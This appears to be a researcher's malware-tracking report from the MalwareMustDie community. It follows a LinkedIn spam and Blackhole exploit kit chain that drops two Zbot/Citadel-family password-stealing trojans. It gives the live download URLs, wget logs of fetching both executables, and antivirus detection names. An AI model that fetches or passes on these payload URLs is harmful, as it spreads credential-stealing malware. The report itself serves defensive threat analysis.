- *) Previous report: http://pastebin.com/raw.php?i=z7n6SVxf
- *) Continuation of the LinkedIn spam, BHEK2, PluginDetect e,f, and Citadel InfoStealer (CRYPT to POST/HTTP) AND... finally that payload downloaded THESE TWO MORE Trojans:
- * GET /Z2U.exe HTTP/1.0 Host: 3073.a.hostable.me
- * GET /PNV3Hbi.exe HTTP/1.0 Host: 85.18.21.252
- --15:43:09-- http://3073.a.hostable.me/Z2U.exe
- => `Z2U.exe'
- Resolving 3073.a.hostable.me... 204.152.255.3
- Connecting to 3073.a.hostable.me|204.152.255.3|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 407,128 (398K) [application/x-msdownload]
- 15:43:12 (180.00 KB/s) - `Z2U.exe' saved [407128/407128]
- --15:43:44-- http://85.18.21.252/PNV3Hbi.exe
- => `PNV3Hbi.exe'
- Connecting to 85.18.21.252:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 407,128 (398K) [application/x-msdos-program]
- 15:43:49 (93.95 KB/s) - `PNV3Hbi.exe' saved [407128/407128]
- VT:
- https://www.virustotal.com/file/fed6336f6a8e4d09d83a9eff1485276434be3377012f7bafc99474bd0a7ce162/analysis/1350456794/
- DrWeb : Trojan.PWS.Panda.3001
- Norman : W32/Krypt.GB
- McAfee-GW-Edition : PWS-Zbot.gen.aln
- nProtect : Trojan/W32.Agent.407128.B
- McAfee : PWS-Zbot.gen.aln
- Fortinet : W32/Kryptik.WDV!tr
- Kingsoft : Win32.Troj.Agent.ai.(kcloud)
- Panda : Suspicious file
- #MalwareMustDie!!!